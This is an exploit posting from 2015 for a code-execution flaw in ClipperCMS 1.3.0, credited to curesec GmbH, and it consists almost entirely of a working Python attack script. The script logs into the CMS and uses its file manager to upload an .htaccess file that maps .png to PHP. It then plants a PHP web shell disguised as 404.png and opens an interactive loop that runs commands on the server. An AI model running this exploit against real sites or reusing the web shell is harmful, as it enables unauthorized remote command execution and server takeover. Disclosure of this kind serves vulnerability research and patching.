ClipperCMS 1.3.0: Code Execution Exploit

ClipperCMS 1.3.0: Code Execution Exploit

Date: 2015-11-13 11:39:31

#!/usr/local/bin/python # Exploit for ClipperCMS 1.3.0 Code Execution vulnerability # An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role) # The server must parse htaccess files for this exploit to work. # curesec GmbH import sys import re import requests # requires requests lib if len(sys.argv) != 4: exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin") url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] loginPath = "/manager/processors/login.processor.php" fileManagerPath = "/manager/index.php?a=31" def login(requestSession, url, username, password): postData = {"ajax": "1", "username": username, "password": password} return requestSession.post(url, data = postData, headers = {"referer": url}) def getFullPath(requestSession, url): request = requestSession.get(url, headers = {"referer": url}) if "You don't have enough privileges" in request.text: return "cant upload" fullPath = re.search("var current_path = '(.*)';", request.text) return fullPath.group(1) def upload(requestSession, url, fileName, fileContent, postData): filesData = {"userfile[0]": (fileName, fileContent)} return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url}) def workingShell(url, fullPath): return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/") def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text) command = raw_input("$ ") requestSession = requests.session() loginResult = login(requestSession, url + loginPath, username, password) if "Incorrect username" in loginResult.text: exit("ERROR: Incorrect username or password") else: print("successful: login as " + username) fullPath = getFullPath(requestSession, url + fileManagerPath) if fullPath == "cant upload": exit("ERROR: user does not have required privileges") else: print("successful: user is allowed to use file manager. Full path: " + fullPath) uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath}) if "File uploaded successfully" not in uploadResult.text: exit("ERROR: could not upload .htaccess file") else: print("successful: .htaccess upload") uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath}) if "File uploaded successfully" not in uploadResult.text: exit("ERROR: could not upload shell") else: print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>") if workingShell(url + "404.png?x=", fullPath): print("successful: shell seems to be working") else: exit("ERROR: shell does not seem to be working correctly") runShell(url + "404.png?x=")